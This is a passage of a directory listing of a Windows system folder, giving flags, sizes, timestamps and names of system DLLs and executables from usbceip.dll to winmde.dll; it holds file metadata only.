09/15/2018 07:28:29 usbceip.dll +F 336896 09/15/2018 07:28:56 usbmon.dll +F 14336 09/15/2018 07:28:29 usbperf.dll +F 45568 09/15/2018 07:28:38 UsbPmApi.dll +F 74752 09/15/2018 07:29:14 UsbSettingsHandlers.dll +F 54784 09/15/2018 07:28:20 UsbTask.dll +F 90112 09/15/2018 07:28:26 usbui.dll +F 1664904 03/07/2020 00:53:43 user32.dll +F 47192 09/15/2018 07:28:44 UserAccountBroker.exe +F 88576 09/15/2018 07:28:50 UserAccountControlSettings.dll +F 100352 03/07/2020 00:53:57 UserAccountControlSettings.exe +F 203776 03/07/2020 00:53:37 useractivitybroker.dll +F 1353728 09/15/2018 07:28:44 usercpl.dll +F 8192 09/15/2018 07:28:36 UserDataAccessRes.dll +F 447488 09/15/2018 07:28:34 UserDataAccountApis.dll +F 43520 09/15/2018 07:28:36 UserDataLanguageUtil.dll +F 61952 09/15/2018 07:28:36 UserDataPlatformHelperUtil.dll +F 1540608 09/15/2018 07:28:36 UserDataService.dll +F 121344 03/07/2020 00:53:41 UserDataTimeUtil.dll +F 46080 09/15/2018 07:28:36 UserDataTypeHelperUtil.dll +F 199168 09/15/2018 07:28:30 UserDeviceRegistration.dll +F 249856 09/15/2018 07:28:30 UserDeviceRegistration.Ngc.dll +F 152896 03/07/2020 00:53:26 userenv.dll +F 33792 09/15/2018 07:28:45 userinit.exe +F 19968 09/15/2018 07:28:50 userinitext.dll +F 60928 09/15/2018 07:28:36 UserLanguageProfileCallback.dll +F 1255936 03/07/2020 00:53:55 usermgr.dll +F 76944 09/15/2018 07:28:46 usermgrcli.dll +F 281600 09/15/2018 07:28:46 UserMgrProxy.dll +F 31232 09/15/2018 07:28:22 usk.rs +F 109056 03/07/2020 00:53:29 usoapi.dll +F 48128 03/07/2020 00:53:29 UsoClient.exe +F 902144 03/07/2020 00:53:29 usocore.dll +F 79360 03/07/2020 00:53:55 usp10.dll +F 50176 09/15/2018 07:28:44 ustprov.dll +F 103936 03/07/2020 00:53:29 utcutil.dll +F 45976 09/15/2018 07:28:45 utildll.dll +F 113664 09/15/2018 07:28:42 Utilman.exe +F 167936 09/15/2018 07:28:43 uudf.dll +F 145408 09/15/2018 07:28:41 UvcModel.dll +F 109568 03/07/2020 00:54:22 uwfcfgmgmt.dll +F 144384 09/15/2018 09:10:04 uwfcsp.dll +F 30720 03/07/2020 00:54:22 uwfservicingapi.dll +F 89088 09/15/2018 07:28:44 UXInit.dll +F 176656 09/15/2018 07:28:58 uxlib.dll +F 11792 09/15/2018 07:28:58 uxlibres.dll +F 613376 03/07/2020 00:53:53 uxtheme.dll +F 418576 03/07/2020 00:53:31 vac.dll +F 547328 03/07/2020 00:54:17 VAN.dll +F 740352 09/15/2018 07:29:23 Vault.dll +F 152576 03/07/2020 00:53:37 VaultCDS.dll +F 296960 09/15/2018 07:28:36 vaultcli.dll +F 30208 09/15/2018 07:28:36 VaultCmd.exe +F 113152 09/15/2018 07:28:30 VaultRoaming.dll +F 359424 03/07/2020 00:53:40 vaultsvc.dll +F 167936 09/15/2018 07:29:23 VBICodec.ax +F 46080 09/15/2018 07:29:24 vbisurf.ax +F 136192 09/15/2018 07:29:16 vbsapi.dll +F 595968 03/07/2020 00:53:45 vbscript.dll +F 189952 09/15/2018 07:28:36 VCardParser.dll +F 391344 02/16/2017 16:45:12 vccorlib140.dll +F 87224 02/16/2017 16:45:12 vcruntime140.dll +F 640000 09/15/2018 07:28:44 vds.exe +F 239616 03/07/2020 00:53:52 vdsbas.dll +F 583168 09/15/2018 07:29:22 vdsdyn.dll +F 25600 09/15/2018 07:28:44 vdsldr.exe +F 130048 09/15/2018 07:28:44 vdsutil.dll +F 57344 09/15/2018 07:28:44 vdsvd.dll +F 109056 09/15/2018 07:28:44 vds_ps.dll +F 13824 09/15/2018 07:28:58 verclsid.exe +F 383184 09/15/2018 07:29:14 verifier.dll +F 160768 09/15/2018 07:28:36 verifier.exe +F 189440 09/15/2018 07:28:45 verifiergui.exe +F 30664 09/15/2018 07:28:58 version.dll +F 164504 03/07/2020 00:53:28 vertdll.dll +F 150528 03/07/2020 00:53:32 vfuprov.dll +F 68096 09/15/2018 07:29:22 vfwwdm32.dll +F 83472 03/07/2020 00:53:22 vid.dll +F 33792 09/15/2018 07:29:22 vidcap.ax +F 227840 03/07/2020 00:53:45 VideoHandlers.dll +F 111576 09/15/2018 09:10:01 VIDRESZR.DLL +F 65336 09/15/2018 07:28:39 virtdisk.dll +F 91720 01/10/2020 16:48:08 VMAgentDisabler.dll +F 26128 09/15/2018 07:29:24 VmApplicationHealthMonitorProxy.dll +F 28936 09/15/2018 07:28:19 vmbuspipe.dll +F 212992 09/15/2018 07:29:14 vmdevicehost.dll +F 60216 09/15/2018 07:29:24 vmictimeprovider.dll +F 431616 09/15/2018 07:29:24 vmrdvcore.dll +F 131584 09/15/2018 07:28:22 VocabRoamingHandler.dll +F 44032 09/15/2018 07:28:39 VoiceActivationManager.dll +F 148480 09/15/2018 07:28:39 VoipRT.dll +F 684544 03/07/2020 00:53:45 vpnike.dll +F 54272 09/15/2018 07:28:57 vpnikeapi.dll +F 11264 09/15/2018 07:28:56 VpnSohDesktop.dll +F 238080 03/07/2020 00:53:40 VPNv2CSP.dll +F 20480 09/15/2018 07:29:46 VscMgrPS.dll +F 143872 09/15/2018 07:29:23 vssadmin.exe +F 1622016 03/07/2020 00:53:47 vssapi.dll +F 68608 09/15/2018 07:28:39 vsstrace.dll +F 1516544 03/07/2020 00:53:47 VSSVC.exe +F 61952 09/15/2018 07:28:39 vss_ps.dll +F 646656 03/07/2020 00:53:28 w32time.dll +F 248832 03/07/2020 00:53:28 w32tm.exe +F 35328 09/15/2018 07:28:29 w32topl.dll +F 113664 09/15/2018 07:28:36 WaaSAssessment.dll +F 88576 03/07/2020 00:53:29 WaaSMedicAgent.exe +F 257024 03/07/2020 00:53:29 WaaSMedicCapsule.dll +F 28672 09/15/2018 07:28:36 WaaSMedicPS.dll +F 357888 03/07/2020 00:53:29 WaaSMedicSvc.dll +F 72192 09/15/2018 07:29:14 WABSyncProvider.dll +F 39936 09/15/2018 07:29:23 waitfor.exe +F 12800 09/15/2018 07:28:36 WalletBackgroundServiceProxy.dll +F 104448 09/15/2018 07:28:36 WalletProxy.dll +F 431104 09/15/2018 07:29:46 WalletService.dll +F 22528 09/15/2018 07:28:59 WallpaperHost.exe +F 257536 09/15/2018 07:29:22 wavemsp.dll +F 321024 09/15/2018 07:29:46 wbadmin.exe +D 0 03/07/2020 10:38:32 wbem +F 490496 09/15/2018 07:28:25 wbemcomn.dll +F 1538560 03/07/2020 00:54:08 wbengine.exe +F 955392 03/07/2020 00:53:42 wbiosrvc.dll +F 50176 03/07/2020 00:53:26 wcimage.dll +F 139264 09/15/2018 07:28:25 wcmapi.dll +F 236032 09/15/2018 07:28:25 wcmcsp.dll +F 1021952 03/07/2020 00:53:34 wcmsvc.dll +D 0 09/15/2018 09:07:53 WCN +F 137216 09/15/2018 07:28:26 WcnApi.dll +F 475136 09/15/2018 07:28:26 wcncsvc.dll +F 38912 09/15/2018 07:28:26 WcnEapAuthProxy.dll +F 36864 09/15/2018 07:28:26 WcnEapPeerProxy.dll +F 48640 09/15/2018 07:28:25 WcnNetsh.dll +F 1315840 09/15/2018 07:28:25 wcnwiz.dll +F 305664 03/07/2020 00:53:26 wc_storage.dll +F 1418240 09/15/2018 07:29:21 wdc.dll +D 0 03/29/2020 09:19:09 WDI +F 102400 09/15/2018 07:28:52 wdi.dll +F 218624 03/07/2020 00:53:53 wdigest.dll +F 254976 09/15/2018 07:28:20 wdmaud.drv +F 248120 09/15/2018 06:09:28 wdscore.dll +F 614 09/15/2018 07:28:44 WdsUnattendTemplate.xml +F 4608 09/15/2018 07:28:23 WEB.rs +F 399872 09/15/2018 07:28:34 webauthn.dll +F 10240 09/15/2018 07:28:42 WebCache.exe +F 968704 09/15/2018 09:09:56 WebcamUi.dll +F 262144 09/15/2018 07:29:16 webcheck.dll +F 219136 09/15/2018 07:29:25 WebClnt.dll +F 587776 09/15/2018 07:28:45 webio.dll +F 1309696 03/07/2020 00:54:14 webplatstorageserver.dll +F 2698752 03/07/2020 00:53:58 WebRuntimeManager.dll +F 1383680 09/15/2018 07:28:36 webservices.dll +F 47104 03/07/2020 00:53:26 Websocket.dll +F 77824 09/15/2018 07:29:18 wecapi.dll +F 197632 09/15/2018 07:29:18 wecsvc.dll +F 103936 09/15/2018 07:29:18 wecutil.exe +F 27648 09/15/2018 07:29:14 wephostsvc.dll +F 890400 03/07/2020 00:53:29 wer.dll +F 1292288 03/07/2020 00:54:15 werconcpl.dll +F 123392 03/07/2020 00:54:15 wercplsupport.dll +F 41984 03/07/2020 00:53:29 werdiagcontroller.dll +F 247856 09/15/2018 07:28:46 weretw.dll +F 510504 03/07/2020 00:53:29 WerFault.exe +F 163448 03/07/2020 00:53:29 WerFaultSecure.exe +F 213816 03/07/2020 00:53:29 wermgr.exe +F 215552 03/07/2020 00:53:29 wersvc.dll +F 496128 03/07/2020 00:54:11 werui.dll +F 407712 03/07/2020 00:53:28 wevtapi.dll +F 100352 09/15/2018 07:29:16 wevtfwd.dll +F 1893376 03/07/2020 00:53:28 wevtsvc.dll +F 258560 09/15/2018 07:28:38 wevtutil.exe +F 144384 09/15/2018 07:29:16 wextract.exe +F 115109 09/15/2018 07:28:51 WF.msc +F 24576 09/15/2018 07:28:34 wfapigp.dll +F 41472 09/15/2018 07:28:25 wfdprov.dll +F 76800 09/15/2018 07:28:24 WFDSConMgr.dll +F 715776 03/07/2020 00:53:32 WFDSConMgrSvc.dll +F 88576 09/15/2018 07:29:24 WfHC.dll +F 928768 09/15/2018 07:29:47 WFS.exe +F 669696 09/15/2018 07:29:47 WFSR.dll +F 40448 09/15/2018 07:28:50 whealogr.dll +F 40960 09/15/2018 07:29:22 where.exe +F 16384 09/15/2018 07:28:56 whhelper.dll +F 71680 09/15/2018 07:29:24 whoami.exe +F 95744 09/15/2018 07:29:18 wiaacmgr.exe +F 673792 03/07/2020 00:54:12 wiaaut.dll +F 456192 09/15/2018 07:29:18 wiadefui.dll +F 145920 03/07/2020 00:54:12 wiadss.dll +F 11776 09/15/2018 07:29:18 WiaExtensionHost64.dll +F 83968 03/07/2020 00:54:12 wiarpc.dll +F 100864 09/15/2018 07:29:18 wiascanprofiles.dll +F 651776 03/07/2020 00:54:12 wiaservc.dll +F 462848 09/15/2018 07:29:18 wiashext.dll +F 18432 09/15/2018 07:29:16 wiatrace.dll +F 37888 09/15/2018 07:29:16 wiawow64.exe +F 263680 03/07/2020 00:53:32 WiFiCloudStore.dll +F 46592 09/15/2018 07:28:25 WiFiConfigSP.dll +F 136704 09/15/2018 07:28:26 wificonnapi.dll +F 392192 03/07/2020 00:53:33 WiFiDisplay.dll +F 1114112 03/07/2020 00:53:32 wifinetworkmanager.dll +F 403984 09/15/2018 07:28:26 wifitask.exe +F 2404 09/15/2018 07:28:42 WimBootCompress.ini +F 764216 03/07/2020 00:53:51 wimgapi.dll +F 519992 03/07/2020 00:53:50 wimserv.exe +F 71696 03/07/2020 00:53:51 win32appinventorycsp.dll +F 697856 09/15/2018 09:10:02 win32calc.exe +F 193536 03/07/2020 00:53:51 Win32CompatibilityAppraiserCSP.dll +F 543744 03/07/2020 00:53:43 win32k.sys +F 2418176 03/07/2020 00:53:39 win32kbase.sys +F 3636736 03/07/2020 00:53:43 win32kfull.sys +F 17920 09/15/2018 07:28:38 win32kns.sys +F 847872 03/07/2020 00:53:33 win32spl.dll +F 125704 09/15/2018 07:28:38 win32u.dll +F 27648 09/15/2018 07:28:24 Win32_DeviceGuard.dll +F 178688 03/07/2020 00:53:42 winbio.dll +D 0 03/30/2020 03:39:14 WinBioDatabase +F 389120 03/07/2020 00:53:51 WinBioDataModel.dll +F 60928 09/15/2018 07:29:46 WinBioDataModelOOBE.exe +F 41984 09/15/2018 07:29:14 winbioext.dll +D 0 03/07/2020 00:55:55 WinBioPlugIns +F 186464 03/07/2020 00:53:24 winbrand.dll +F 442880 09/15/2018 07:28:46 wincorlib.dll +F 44032 09/15/2018 07:29:14 wincredprovider.dll +F 201216 03/07/2020 00:53:57 wincredui.dll +F 1333248 03/07/2020 00:53:42 WindowManagement.dll +F 1005568 03/07/2020 00:53:38 Windows.AccountsControl.dll +F 4866560 03/07/2020 00:53:38 Windows.AI.MachineLearning.dll +F 108032 09/15/2018 07:28:30 Windows.AI.MachineLearning.Preview.dll +F 118784 09/15/2018 07:28:26 Windows.ApplicationModel.Background.SystemEventsBroker.dll +F 30208 09/15/2018 07:28:26 Windows.ApplicationModel.Background.TimeBroker.dll +F 211968 09/15/2018 07:28:29 Windows.ApplicationModel.Core.dll +F 818640 03/07/2020 00:53:38 windows.applicationmodel.datatransfer.dll +F 904104 03/07/2020 00:53:24 Windows.ApplicationModel.dll +F 498688 03/07/2020 00:53:43 Windows.ApplicationModel.LockScreen.dll +F 2233688 03/07/2020 00:53:41 Windows.ApplicationModel.Store.dll +F 65024 09/15/2018 07:28:32 Windows.ApplicationModel.Store.Preview.DOSettings.dll +F 312832 03/07/2020 00:53:41 Windows.ApplicationModel.Store.TestingFramework.dll +F 567296 09/15/2018 07:28:34 Windows.ApplicationModel.Wallet.dll +F 2050560 03/07/2020 00:53:38 Windows.CloudStore.dll +F 148480 09/15/2018 07:28:59 Windows.CloudStore.Schema.DesktopShell.dll +F 1085952 03/07/2020 00:53:35 Windows.CloudStore.Schema.Shell.dll +F 505856 03/07/2020 00:53:45 Windows.Cortana.Desktop.dll +F 326144 03/07/2020 00:53:45 Windows.Cortana.OneCore.dll +F 144384 03/07/2020 00:53:57 Windows.Cortana.PAL.Desktop.dll +F 128000 09/15/2018 07:28:57 Windows.Cortana.ProxyStub.dll +F 494080 03/07/2020 00:53:50 Windows.Data.Activities.dll +F 7888896 03/07/2020 00:53:38 Windows.Data.Pdf.dll +F 628736 09/15/2018 07:28:30 Windows.Devices.AllJoyn.dll +F 86016 03/07/2020 00:53:37 Windows.Devices.Background.dll +F 20992 09/15/2018 07:28:30 Windows.Devices.Background.ps.dll +F 2233856 03/07/2020 00:53:37 Windows.Devices.Bluetooth.dll +F 96768 03/07/2020 00:53:37 Windows.Devices.Custom.dll +F 23552 09/15/2018 07:28:30 Windows.Devices.Custom.ps.dll +F 508720 03/07/2020 00:53:39 Windows.Devices.Enumeration.dll +F 189952 09/15/2018 07:28:30 Windows.Devices.Haptics.dll +F 280064 09/15/2018 07:28:30 Windows.Devices.HumanInterfaceDevice.dll +F 378880 03/07/2020 00:53:42 Windows.Devices.Lights.dll +F 611840 03/07/2020 00:53:40 Windows.Devices.LowLevel.dll +F 431104 09/15/2018 07:28:22 Windows.Devices.Midi.dll +F 2357248 09/15/2018 07:28:38 Windows.Devices.Perception.dll +F 456704 03/07/2020 00:53:40 Windows.Devices.Picker.dll +F 1718272 09/15/2018 07:28:36 Windows.Devices.PointOfService.dll +F 52224 09/15/2018 07:28:29 Windows.Devices.Portable.dll +F 90112 09/15/2018 07:28:30 Windows.Devices.Printers.dll +F 44544 09/15/2018 07:28:55 Windows.Devices.Printers.Extensions.dll +F 220672 03/07/2020 00:53:37 Windows.Devices.Radios.dll +F 220672 09/15/2018 07:29:18 Windows.Devices.Scanners.dll +F 1287072 03/07/2020 00:53:43 Windows.Devices.Sensors.dll +F 149504 03/07/2020 00:53:37 Windows.Devices.SerialCommunication.dll +F 900096 09/15/2018 07:28:30 Windows.Devices.SmartCards.dll +F 594432 09/15/2018 07:28:34 Windows.Devices.SmartCards.Phone.dll +F 417280 09/15/2018 07:28:29 Windows.Devices.Usb.dll +F 289280 09/15/2018 07:28:30 Windows.Devices.WiFi.dll +F 501248 09/15/2018 07:28:24 Windows.Devices.WiFiDirect.dll +F 183808 09/15/2018 07:28:30 Windows.Energy.dll +F 807936 09/15/2018 07:28:30 Windows.Gaming.Input.dll +F 391680 03/07/2020 00:53:39 Windows.Gaming.Preview.dll +F 89600 09/15/2018 07:28:32 Windows.Gaming.UI.GameBar.dll +F 456192 09/15/2018 07:28:20 Windows.Gaming.XboxLive.Storage.dll +F 1533440 03/07/2020 00:53:37 Windows.Globalization.dll +F 64000 09/15/2018 07:28:30 Windows.Globalization.Fontgroups.dll +F 888320 09/15/2018 07:28:36 Windows.Globalization.PhoneNumberFormatting.dll +F 130872 03/07/2020 00:53:43 Windows.Graphics.Display.BrightnessOverride.dll +F 149240 03/07/2020 00:53:40 Windows.Graphics.Display.DisplayEnhancementOverride.dll +F 494080 03/07/2020 00:53:40 Windows.Graphics.dll +F 2276864 09/15/2018 07:28:30 Windows.Graphics.Printing.3D.dll +F 792576 09/15/2018 07:28:30 Windows.Graphics.Printing.dll +F 448000 03/07/2020 00:53:45 Windows.Graphics.Printing.Workflow.dll +F 16896 09/15/2018 07:28:56 Windows.Graphics.Printing.Workflow.Native.dll +F 158208 09/15/2018 07:29:16 Windows.Help.Runtime.dll +F 701440 03/07/2020 00:53:43 windows.immersiveshell.serviceprovider.dll +F 135680 09/15/2018 07:28:41 Windows.Internal.AdaptiveCards.XamlCardRenderer.dll +F 628736 03/07/2020 00:53:37 Windows.Internal.Bluetooth.dll +F 231424 03/07/2020 00:53:49 Windows.Internal.CapturePicker.Desktop.dll +F 168448 03/07/2020 00:53:50 Windows.Internal.CapturePicker.dll +F 235008 03/07/2020 00:53:41 Windows.Internal.Devices.Sensors.dll +F 169984 09/15/2018 07:28:32 Windows.Internal.Graphics.Display.DisplayEnhancementManagement.dll +F 949248 03/07/2020 00:53:58 Windows.Internal.Management.dll +F 65536 09/15/2018 07:28:26 Windows.Internal.PlatformExtension.DevicePickerExperience.dll +F 54272 09/15/2018 07:29:14 Windows.Internal.PlatformExtension.MiracastBannerExperience.dll +F 506368 03/07/2020 00:54:17 Windows.Internal.PredictionUnit.dll +F 149504 03/07/2020 00:53:28 Windows.Internal.Security.Attestation.DeviceAttestation.dll +F 46592 09/15/2018 07:29:16 Windows.Internal.SecurityMitigationsBroker.dll +F 1162088 03/07/2020 00:53:57 Windows.Internal.Shell.Broker.dll +F 88576 03/07/2020 00:53:36 windows.internal.shellcommon.AccountsControlExperience.dll +F 61440 09/15/2018 07:28:29 windows.internal.shellcommon.AppResolverModal.dll +F 138624 03/07/2020 00:53:36 Windows.Internal.ShellCommon.Broker.dll +F 41472 09/15/2018 07:28:41 windows.internal.shellcommon.FilePickerExperienceMEM.dll +F 40960 09/15/2018 07:28:58 Windows.Internal.ShellCommon.PrintExperience.dll +F 327168 03/07/2020 00:53:36 windows.internal.shellcommon.shareexperience.dll +F 43008 09/15/2018 07:28:45 windows.internal.shellcommon.ShellPosition.dll +F 60416 09/15/2018 07:28:26 windows.internal.shellcommon.TokenBrokerModal.dll +F 848896 03/07/2020 00:53:32 Windows.Internal.Signals.dll +F 57344 09/15/2018 07:28:42 Windows.Internal.UI.BioEnrollment.ProxyStub.dll +F 257024 09/15/2018 07:28:50 Windows.Internal.UI.Logon.ProxyStub.dll +F 33792 09/15/2018 07:28:25 Windows.Management.Provisioning.ProxyStub.dll +F 373248 03/07/2020 00:53:33 Windows.Management.Service.dll +F 239120 03/07/2020 00:53:39 Windows.Management.Workplace.dll +F 34304 09/15/2018 07:28:26 Windows.Management.Workplace.WorkplaceSettings.dll +F 1282048 09/15/2018 09:10:05 Windows.Media.Audio.dll +F 877056 03/07/2020 00:53:36 Windows.Media.BackgroundMediaPlayback.dll +F 13312 09/15/2018 07:28:26 Windows.Media.BackgroundPlayback.exe +F 403544 09/15/2018 07:28:20 Windows.Media.Devices.dll +F 7727336 03/07/2020 00:54:26 Windows.Media.dll +F 1383936 09/15/2018 09:10:02 Windows.Media.Editing.dll +F 1390592 09/15/2018 07:28:30 Windows.Media.FaceAnalysis.dll +F 821248 09/15/2018 07:28:29 Windows.Media.Import.dll +F 511040 09/15/2018 07:28:42 Windows.Media.MediaControl.dll +F 946688 09/15/2018 07:28:29 Windows.Media.Ocr.dll +F 874496 03/07/2020 00:53:36 Windows.Media.Playback.BackgroundMediaPlayer.dll +F 855040 03/07/2020 00:53:36 Windows.Media.Playback.MediaPlayer.dll +F 113152 09/15/2018 07:28:26 Windows.Media.Playback.ProxyStub.dll +F 7645392 03/07/2020 00:53:36 Windows.Media.Protection.PlayReady.dll +F 113664 09/15/2018 09:10:00 Windows.Media.Renewal.dll +F 1818624 03/07/2020 00:53:47 Windows.Media.Speech.dll +F 568832 09/15/2018 07:28:39 Windows.Media.Speech.UXRes.dll +F 1084416 03/07/2020 00:53:28 Windows.Media.Streaming.dll +F 218624 09/15/2018 09:09:59 Windows.Media.Streaming.ps.dll +F 3952760 03/07/2020 00:54:17 Windows.Mirage.dll +F 949760 03/07/2020 00:54:17 Windows.Mirage.Internal.dll +F 102912 09/15/2018 07:28:29 Windows.Networking.BackgroundTransfer.BackgroundManagerPolicy.dll +F 502784 09/15/2018 07:28:29 Windows.Networking.BackgroundTransfer.ContentPrefetchTask.dll +F 975360 09/15/2018 07:28:26 Windows.Networking.BackgroundTransfer.dll +F 745984 03/07/2020 00:53:34 Windows.Networking.Connectivity.dll +F 940032 09/15/2018 07:28:29 Windows.Networking.dll +F 227840 09/15/2018 07:28:29 Windows.Networking.HostName.dll +F 354304 09/15/2018 07:28:36 Windows.Networking.NetworkOperators.ESim.dll +F 140288 03/07/2020 00:53:33 Windows.Networking.NetworkOperators.HotspotAuthentication.dll +F 348160 09/15/2018 07:28:30 Windows.Networking.Proximity.dll +F 115200 09/15/2018 07:28:32 Windows.Networking.ServiceDiscovery.Dnssd.dll +F 189440 03/07/2020 00:53:34 Windows.Networking.Sockets.PushEnabledApplication.dll +F 569344 09/15/2018 07:28:38 Windows.Networking.UX.EapRequestHandler.dll +F 1311232 03/07/2020 00:53:40 Windows.Networking.Vpn.dll +F 75776 09/15/2018 07:29:13 Windows.Networking.XboxLive.ProxyStub.dll +F 610304 09/15/2018 07:28:34 Windows.Payments.dll +F 987736 03/07/2020 00:53:37 Windows.Perception.Stub.dll +F 269312 09/15/2018 07:28:36 Windows.Security.Authentication.Identity.Provider.dll +F 890368 03/07/2020 00:53:36 Windows.Security.Authentication.OnlineId.dll +F 1038336 03/07/2020 00:53:37 Windows.Security.Authentication.Web.Core.dll +F 110040 09/15/2018 07:28:29 Windows.Security.Credentials.UI.CredentialPicker.dll +F 123904 09/15/2018 07:28:29 Windows.Security.Credentials.UI.UserConsentVerifier.dll +F 57144 09/15/2018 07:28:29 Windows.Security.Integrity.dll +F 1081656 03/07/2020 00:53:41 Windows.Services.TargetedContent.dll +F 223744 03/07/2020 00:53:49 Windows.SharedPC.AccountManager.dll +F 182784 03/07/2020 00:53:48 Windows.SharedPC.CredentialProvider.dll +F 340480 03/07/2020 00:53:49 Windows.Shell.BlueLightReduction.dll +F 59904 09/15/2018 07:28:57 Windows.Shell.Search.UriHandler.dll +F 96256 09/15/2018 07:28:34 Windows.Shell.ServiceHostBuilder.dll +F 22528 09/15/2018 07:28:30 Windows.Shell.StartLayoutPopulationEvents.dll +F 4997096 03/07/2020 00:53:25 Windows.StateRepository.dll +F 101176 03/07/2020 00:53:25 Windows.StateRepositoryBroker.dll +F 156984 03/07/2020 00:53:25 Windows.StateRepositoryClient.dll +F 41472 03/07/2020 00:53:25 Windows.StateRepositoryCore.dll +F 1219424 03/07/2020 00:53:25 Windows.StateRepositoryPS.dll +F 195072 03/07/2020 00:53:25 Windows.StateRepositoryUpgrade.dll +F 351432 03/07/2020 00:53:38 Windows.Storage.ApplicationData.dll +F 179200 09/15/2018 07:28:30 Windows.Storage.Compression.dll +F 7700480 03/07/2020 00:53:25 windows.storage.dll +F 224768 03/07/2020 00:53:25 Windows.Storage.OneCore.dll +F 723456 03/07/2020 00:53:37 Windows.Storage.Search.dll +F 371200 03/07/2020 00:53:41 Windows.System.Diagnostics.dll +F 56320 09/15/2018 07:28:30 Windows.System.Diagnostics.Telemetry.PlatformTelemetryClient.dll +F 107008 09/15/2018 07:28:30 Windows.System.Diagnostics.TraceReporting.PlatformDiagnosticActions.dll +F 681984 03/07/2020 00:53:37 Windows.System.Launcher.dll +F 221184 09/15/2018 07:29:21 Windows.System.Profile.HardwareId.dll +F 71168 03/07/2020 00:53:37 Windows.System.Profile.PlatformDiagnosticsAndUsageDataSettings.dll +F 135680 09/15/2018 07:28:36 Windows.System.Profile.RetailInfo.dll +F 60416 09/15/2018 07:28:34 Windows.System.Profile.SystemId.dll +F 51200 03/07/2020 00:53:37 Windows.System.Profile.SystemManufacturers.dll +F 23040 09/15/2018 07:28:30 Windows.System.RemoteDesktop.dll +F 329216 03/07/2020 00:53:37 Windows.System.SystemManagement.dll +F 91648 09/15/2018 07:28:30 Windows.System.UserDeviceAssociation.dll +F 62976 09/15/2018 07:28:30 Windows.System.UserProfile.DiagnosticsSettings.dll +F 65536 09/15/2018 07:28:30 Windows.UI.Accessibility.dll +F 281088 03/07/2020 00:53:36 Windows.UI.AppDefaults.dll +F 425984 09/15/2018 07:29:46 Windows.UI.BioFeedback.dll +F 470528 09/15/2018 07:28:42 Windows.UI.BlockedShutdown.dll +F 820736 03/07/2020 00:53:40 Windows.UI.Core.TextInput.dll +F 1568768 03/07/2020 00:53:51 Windows.UI.Cred.dll +F 302592 03/07/2020 00:53:57 Windows.UI.CredDialogController.dll +F 1287584 03/07/2020 00:53:36 Windows.UI.dll +F 1711104 03/07/2020 00:53:57 Windows.UI.Immersive.dll +F 4645888 09/15/2018 07:28:32 Windows.UI.Input.Inking.Analysis.dll +F 1768960 03/07/2020 00:53:35 Windows.UI.Input.Inking.dll +F 200192 09/15/2018 07:28:20 Windows.UI.Internal.Input.ExpressiveInput.dll +F 84480 09/15/2018 07:28:20 Windows.UI.Internal.Input.ExpressiveInput.Resource.dll +F 2981888 03/07/2020 00:53:51 Windows.UI.Logon.dll +F 79360 09/15/2018 07:28:42 Windows.UI.NetworkUXController.dll +F 2738688 09/15/2018 07:29:46 Windows.UI.PicturePassword.dll +F 902656 03/07/2020 00:53:45 Windows.UI.Search.dll +F 41984 09/15/2018 07:29:46 Windows.UI.Shell.dll +F 128512 03/07/2020 00:53:36 Windows.UI.Storage.dll +F 4853760 03/07/2020 00:53:34 Windows.UI.Xaml.Controls.dll +F 17484800 03/07/2020 00:53:35 Windows.UI.Xaml.dll +F 1030656 09/15/2018 07:28:29 Windows.UI.Xaml.InkControls.dll +F 1336832 09/15/2018 07:28:26 Windows.UI.Xaml.Maps.dll +F 1194496 03/07/2020 00:53:34 Windows.UI.Xaml.Phone.dll +F 43520 09/15/2018 07:28:26 Windows.UI.Xaml.Resources.Common.dll +F 446464 09/15/2018 07:28:36 Windows.UI.Xaml.Resources.rs1.dll +F 497664 09/15/2018 07:28:36 Windows.UI.Xaml.Resources.rs2.dll +F 606720 09/15/2018 07:28:36 Windows.UI.Xaml.Resources.rs3.dll +F 634368 09/15/2018 07:28:36 Windows.UI.Xaml.Resources.rs4.dll +F 690688 09/15/2018 07:28:36 Windows.UI.Xaml.Resources.rs5.dll +F 289792 09/15/2018 07:28:36 Windows.UI.Xaml.Resources.th.dll +F 241664 09/15/2018 07:28:36 Windows.UI.Xaml.Resources.win81.dll +F 142336 09/15/2018 07:28:34 Windows.UI.Xaml.Resources.win8rtm.dll +F 162816 03/07/2020 00:53:51 Windows.UI.XamlHost.dll +F 32768 09/15/2018 07:28:32 Windows.WARP.JITService.dll +F 32768 09/15/2018 07:28:32 Windows.WARP.JITService.exe +F 231424 09/15/2018 07:28:34 Windows.Web.Diagnostics.dll +F 735232 03/07/2020 00:53:34 Windows.Web.dll +F 1335296 03/07/2020 00:53:34 Windows.Web.Http.dll +F 60928 09/15/2018 07:29:19 WindowsActionDialog.exe +F 1796400 03/07/2020 00:53:39 WindowsCodecs.dll +F 284160 09/15/2018 07:28:32 WindowsCodecsExt.dll +F 32924984 09/15/2018 09:09:57 WindowsCodecsRaw.dll +F 1649 09/15/2018 07:29:35 WindowsCodecsRaw.txt +F 125440 03/07/2020 00:53:40 WindowsDefaultHeatProcessor.dll +F 78648 09/15/2018 09:09:58 windowsdefenderapplicationguardcsp.dll +F 694784 03/07/2020 00:53:53 WindowsInternal.ComposableShell.ComposerFramework.dll +F 192000 03/07/2020 00:53:50 WindowsInternal.ComposableShell.DesktopHosting.dll +F 226816 09/15/2018 07:28:52 windowslivelogin.dll +F 1133056 09/15/2018 07:28:46 windowsperformancerecordercontrol.dll +D 0 09/15/2018 07:33:50 WindowsPowerShell +F 759 09/15/2018 07:28:26 WindowsSecurityIcon.png +F 47104 03/07/2020 00:53:29 WindowsUpdateElevatedInstaller.exe +F 90624 09/15/2018 07:29:23 winethc.dll +D 0 03/30/2020 08:46:55 winevt +F 29696 09/15/2018 07:29:56 WinFax.dll +F 988240 03/07/2020 00:53:26 winhttp.dll +F 99328 09/15/2018 07:29:13 winhttpcom.dll +F 118272 03/07/2020 00:53:22 WinHvEmulation.dll +F 110080 03/07/2020 00:53:22 WinHvPlatform.dll +F 5086208 03/07/2020 00:53:57 wininet.dll +F 69120 09/15/2018 07:29:16 wininetlui.dll +F 388376 09/15/2018 07:28:45 wininit.exe +F 44040 09/15/2018 07:28:47 wininitext.dll +F 501248 03/07/2020 00:53:42 winipcfile.dll +F 898048 03/07/2020 00:53:42 winipcsecproc.dll +F 99840 09/15/2018 07:28:50 winipsec.dll +F 148480 09/15/2018 07:28:25 winjson.dll +F 420864 09/15/2018 07:28:36 Winlangdb.dll +F 1702600 03/07/2020 00:53:50 winload.efi +F 1473080 03/07/2020 00:53:50 winload.exe +F 782848 03/07/2020 00:53:55 winlogon.exe +F 78336 09/15/2018 07:28:45 winlogonext.dll +F 1771824 03/07/2020 00:53:28 winmde.dll +D 0 